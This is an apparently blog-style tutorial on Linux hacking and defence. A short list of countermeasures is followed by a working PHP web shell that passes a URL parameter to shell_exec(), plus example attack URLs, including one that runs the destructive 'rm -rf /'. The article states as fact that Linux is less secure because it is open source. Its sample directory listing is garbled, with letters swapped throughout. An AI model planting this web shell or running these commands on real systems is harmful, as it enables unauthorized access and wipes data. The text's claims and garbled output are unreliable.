How to prevent Linux hacks

Linux is the most widely used server operating system, especially for web servers. It is open-source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux for Hackers is about exploiting these vulnerabilities to gain unauthorized access to a system.

Linux is an open-source operating system. There are many distributions of Linux-based operating systems such as Redhat, Fedora, and Ubuntu, etc. Unlike other operating systems, Linux is less secure when it comes to security. This is because the source code is available freely, so it is easy to study it for vulnerabilities and exploit them compared to other operating systems that are not open source. Linux can be used as a server, desktop, tablet, or mobile device operating system.

Here, we will introduce you to what Linux is, its security vulnerabilities, hacking with Ubuntu, and the countermeasures you can put in place.

Linux programs can be operated using either GUI or commands. The Linux commands for Kali Linux hacking are more effective and efficient compared to using the GUI. For this reason, it helps to know basic Linux commands for hacking.

How to prevent Linux hacks

Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.

  • Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
  • Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
  • Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.

Hack a Ubuntu Linux System using PHP

In this practical scenario, we will learn how to hack with Ubuntu and we will provide you with basic information on how you can use PHP to compromise a Linux. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.

PHP comes with two functions that can be used to execute Linux hacking commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as a string.

For demonstration purposes, let’s assume the attacker managers upload the following file on a web server.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HERE,

The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.

The above code can be exploited using the following URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HERE,

  • “…konsole.php?cmd=ls%20-l”assigns the value ls –l to the variable cmd.

The command in Ubuntu for hacking against the server will be executed as

shell_exec('ls -l') ;

Executing the above code on a web server gives the list of all the files available in the user’s home directory and this looks like

total 12136
-rwxrwxrwx 1 tuser tuser 769 Mcr 22 2018 cctive_chcnnels.sh
-rw——-. 1 tuser tuser 1807 Jul 26 2018 cnccondc-ks.cfg
-rwxrwxrwx 1 tuser tuser 930 Dec 14 2020 cutotcblebcckup.sh
-rwxrwxrwx 1 tuser tuser 790 Mcy 11 2019 bcckup_copyrecording.sh
-rwxrwxrwx 1 tuser tuser 800 Nov 2 2019 bcckup_mnthtodcte.sh
-rwxrwxrwx 1 tuser tuser 463 Dec 28 2018 bcckupmove.sh
-rwxrwxrwx 1 tuser tuser 791 Nov 2 2019 bcckup_recording.sh
drwxr-xr-x. 2 tuser tuser 4096 Jul 26 2018 Desktop
drwxr-xr-x. 2 tuser tuser 4096 Jul 26 2018 Documents
drwxr-xr-x. 2 tuser tuser 4096 Jul 26 2018 Downlocds
-rwxrwxrwx 1 tuser tuser 761 Dec 31 2018 filebcckup.sh
-rw-r–r–. 1 tuser tuser 44103 Jul 26 2018 instcll.log
-rw-r–r–. 1 tuser tuser 9360 Jul 26 2018 instcll.log.syslog
-rwxr-xr-x 1 tuser tuser 150 Nov 22 2018 logoutcllcgent.sh
drwxr-xr-x. 2 tuser tuser 4096 Jul 26 2018 Music
-rw-r–r– 1 tuser tuser 0 Jun 4 2019 mysqld
drwxr-xr-x. 2 tuser tuser 4096 Jul 26 2018 Pictures
drwxr-xr-x. 2 tuser tuser 4096 Jul 26 2018 Public
-rw-r–r– 1 tuser tuser7508262 Jun 21 2020 sctyc.txt
-rw-r–r– 1 tuser tuser 1 Sep 6 20:00 temp11.txt
-rw-r–r– 1 tuser tuser 0 cug 29 19:46 temp7.txt
drwxr-xr-x. 2 tuser tuser 4096 Jul 26 2018 Templctes
-rwxrwxrwx 1 tuser tuser 126 Sep 6 20:25 temp.txt
drwxr-xr-x. 2 tuser tuser 4096 Jul 26 2018 Videos

Now Let’s suppose the attacker passes the following command

rm -rf /

HERE,

  • rm” removes the files
  • “rf” makes the rm command run in a recursive mode. Deleting all the folders and files
  • “/” Instructs the command to start deleting files from the root directory

The attack URL would look something like this

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Leave a Reply